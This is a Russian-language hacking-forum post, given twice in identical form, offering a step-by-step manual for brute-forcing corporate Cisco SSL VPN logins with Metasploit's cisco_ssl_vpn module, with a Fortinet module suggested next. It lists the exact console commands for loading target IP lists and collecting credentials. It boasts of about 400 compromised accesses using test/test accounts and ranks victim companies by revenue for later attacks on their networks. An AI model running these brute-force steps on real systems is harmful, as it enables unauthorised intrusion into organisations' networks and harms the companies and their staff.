Jakkan
Участник клуба
- Регистрация
- 12 Авг 2020
- Сообщения
- 917
- Реакции
- 30
Всем привет.
Это краткий мануал по работе с корп. сетями, и бруту их VPNов.
Добыча мата.
Первое что нам понадобится это арендованный сервер чем быстрее, тем лучше.
Для удобства работы желательно установить на серв внц или рдп клиент. Как это делать нагуглите сами в крайнем случае спросите у сапорта он вам все установит.
(в кали все установлено по умолчанию), поэтому рекоменудю покупать дедик\впс сразу с кали, если есть такая возможность.
Врываемся в наш арендованный сервер
После врыва и установки всего что нам нужно, открываем консоль и пишем -
systemctl start postgresql
msfdb init
msfconsole
Жмем enter.
Мы запустили metasploit, наверняка все про него наслышаны уже много много раз, и что это, и для чего обьяснять смысла нету
Далее прописываем по списку
Для брута Cisco SSL VPN прописываем -
use auxiliary/scanner/http/cisco_ssl_vpn
set USERNAME берем рандомное часто встречающееся имя пользователя
set PASSWORD указываем пароль
set PASS_FILE указываем путь до файлика с дефолт паролями не более 3 штук
set PASS_FILE – используем только в том случае если хотите меньше тратить
времени на перезаходы на сервак для установки других параметров
set THREADS 10
set RHOSTS file: тут указываем файлик с ипами Cisco SSL VPN
пишем exploit, тычем ентер и забываем за сервак дня так на
3 после завершения сканирования вводим команду сreds
Сканирование не начинается сразу, а только через 30-50 мин
Для того что бы показать в статье, как это работает, я понял что можно дать премию сисадминам огромных корпораций, ибо они оставили не закрытыми тестовые сети впнов
Только по test – test у меня насканило 400 доступов по другим меньше
форти впн пока не тестил но боюсь представить сколько выхлопа будет.
auxiliary/scanner/http/fortinet_ssl_vpn
модуль для форти, можете затестить его.
Думаю, там сами разберетесь принцип тот же
Итак, что мы имеем.
Благодаря тупости сисадминов и оставленным дефолтным паролям, и тестовым учетным записям после чека всего материала статистика выглядит следующим образом:
Всего айпи в скане: 300 000
Открытые миллиардники USA: 15 шт
Конторы от 50кк до 700кк : 230 шт
Конторы с меньшей ревой либо не интересные госы итд: 155
Логин: test
Пароль: test
Далее использовать эти данные можно будет как и для условных атак на их сети имея в своём распоряжении уязвимости их сетей, или же просто для чека фортика(но статья не про это, отрабики и те кто хочет получить фри впнчик оаоаоа можете не читать)
Это краткий мануал по работе с корп. сетями, и бруту их VPNов.
Добыча мата.
Первое что нам понадобится это арендованный сервер чем быстрее, тем лучше.
Для удобства работы желательно установить на серв внц или рдп клиент. Как это делать нагуглите сами в крайнем случае спросите у сапорта он вам все установит.
(в кали все установлено по умолчанию), поэтому рекоменудю покупать дедик\впс сразу с кали, если есть такая возможность.
Врываемся в наш арендованный сервер
После врыва и установки всего что нам нужно, открываем консоль и пишем -
systemctl start postgresql
msfdb init
msfconsole
Жмем enter.
Мы запустили metasploit, наверняка все про него наслышаны уже много много раз, и что это, и для чего обьяснять смысла нету
Далее прописываем по списку
Для брута Cisco SSL VPN прописываем -
use auxiliary/scanner/http/cisco_ssl_vpn
set USERNAME берем рандомное часто встречающееся имя пользователя
set PASSWORD указываем пароль
set PASS_FILE указываем путь до файлика с дефолт паролями не более 3 штук
set PASS_FILE – используем только в том случае если хотите меньше тратить
времени на перезаходы на сервак для установки других параметров
set THREADS 10
set RHOSTS file: тут указываем файлик с ипами Cisco SSL VPN
пишем exploit, тычем ентер и забываем за сервак дня так на
3 после завершения сканирования вводим команду сreds
Сканирование не начинается сразу, а только через 30-50 мин
Для того что бы показать в статье, как это работает, я понял что можно дать премию сисадминам огромных корпораций, ибо они оставили не закрытыми тестовые сети впнов
Только по test – test у меня насканило 400 доступов по другим меньше
форти впн пока не тестил но боюсь представить сколько выхлопа будет.
auxiliary/scanner/http/fortinet_ssl_vpn
модуль для форти, можете затестить его.
Думаю, там сами разберетесь принцип тот же
Итак, что мы имеем.
Благодаря тупости сисадминов и оставленным дефолтным паролям, и тестовым учетным записям после чека всего материала статистика выглядит следующим образом:
Всего айпи в скане: 300 000
Открытые миллиардники USA: 15 шт
Конторы от 50кк до 700кк : 230 шт
Конторы с меньшей ревой либо не интересные госы итд: 155
Логин: test
Пароль: test
Далее использовать эти данные можно будет как и для условных атак на их сети имея в своём распоряжении уязвимости их сетей, или же просто для чека фортика(но статья не про это, отрабики и те кто хочет получить фри впнчик оаоаоа можете не читать)